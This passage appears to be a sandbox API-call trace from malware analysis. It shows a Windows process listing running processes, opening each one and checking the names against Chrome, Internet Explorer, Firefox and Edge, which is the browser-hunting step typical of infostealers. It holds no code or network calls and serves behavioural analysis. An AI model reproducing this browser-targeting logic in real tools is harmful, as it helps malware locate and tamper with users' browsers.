	[0245.100] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0245.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.100] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.100] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0245.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.100] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.101] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0245.101] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x9160
	[0245.101] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.102] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0245.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.102] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.102] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0245.103] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.103] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.103] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0245.104] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x9164
	[0245.104] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.104] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0245.104] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.104] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.104] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.104] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0245.105] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.105] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.105] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0245.106] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x9168
	[0245.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.106] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0245.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.106] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.106] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0245.107] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.107] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.107] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0245.108] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x916c
	[0245.109] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.109] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0245.109] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.109] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.109] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.109] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0245.109] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.109] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.110] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.110] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x9170
	[0245.110] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.110] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.111] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.111] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.111] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.112] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.112] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x9174
	[0245.112] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.112] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.113] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.113] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.113] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.113] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.113] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.113] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.114] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.114] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x9178
	[0245.115] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.115] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.115] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.115] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.115] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.115] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.115] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.116] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.116] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.116] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x917c
	[0245.117] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.117] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.117] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.117] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.117] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.117] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.118] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.118] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.118] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.119] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x9180
	[0245.119] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.119] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.119] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.119] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.119] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.119] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.120] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.120] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.120] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.121] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x9184
	[0245.121] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.121] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.121] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.121] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.121] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.121] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.122] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.122] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.122] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.123] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x9188
	[0245.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.123] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.123] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.126] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.126] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.126] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.126] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.126] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0245.127] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x918c
	[0245.127] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.127] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0245.127] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.127] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.128] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.128] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0245.128] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.128] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.128] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.129] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x9190
	[0245.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.129] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.129] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.130] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.130] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.130] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.130] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.130] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0245.131] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x9194
	[0245.131] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.131] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.131] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.132] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.132] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.132] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.132] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.132] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.132] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0245.133] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x9198
	[0245.133] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.133] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0245.134] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.134] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.134] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.134] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0245.134] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.134] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.134] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.135] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x919c
	[0245.135] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.135] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.136] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.136] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.136] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.136] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.136] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.136] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.137] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0245.137] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x91a0
	[0245.138] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.138] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0245.138] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.138] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.138] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.138] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0245.139] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.139] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.139] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0245.140] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x91a4
	[0245.140] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.140] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0245.141] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.141] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.141] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.141] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0245.141] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.141] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.142] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0245.142] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x91a8
	[0245.142] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.143] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0245.143] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.143] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.143] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.143] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0245.143] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.143] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.143] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0245.144] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x91ac
	[0245.144] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.144] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0245.145] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.145] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.145] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.145] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0245.145] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.145] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.146] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0245.146] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0245.146] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0245.147] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x91b0
	[0245.147] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.147] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0245.148] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.148] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.149] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.149] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0245.149] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.149] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.150] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0245.150] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x91b4
	[0245.150] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.150] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0245.151] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.151] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.151] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.151] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0245.151] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.151] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.152] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0245.152] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x91b8
	[0245.152] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.153] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0245.153] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.153] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.153] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.153] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0245.154] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.154] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.154] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0245.156] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x91bc
	[0245.156] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.156] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0245.156] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.156] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.156] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.156] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0245.157] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
